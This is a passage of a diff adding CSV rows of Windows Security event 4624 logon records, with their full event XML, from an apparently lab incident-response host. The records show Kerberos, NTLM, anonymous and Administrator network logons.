+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.450493Z"">
+    </TimeCreated>
+    <EventRecordID>2988529</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567515</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50251</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.725408Z"">
+    </TimeCreated>
+    <EventRecordID>2988525</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56738f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64223</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.637236Z"">
+    </TimeCreated>
+    <EventRecordID>2988522</EventRecordID>
+    <Correlation ActivityID=""2654C2A7-231C-0002-BAC2-54261C23D801"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-84104</Data>
+    <Data Name=""TargetUserName"">02694W-WIN10$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x567343</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">429CA5A3-EDFC-5657-17C3-C050C7B047F4</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50250</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:17.194652Z"">
+    </TimeCreated>
+    <EventRecordID>772611</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""2996"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1137987</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50107</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.870643Z"">
+    </TimeCreated>
+    <EventRecordID>772609</EventRecordID>
+    <Correlation ActivityID=""E671C39D-919D-0001-B2C3-71E69D91D601"">
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x244</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.697736Z"">
+    </TimeCreated>
+    <EventRecordID>772607</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1136e95</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50106</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
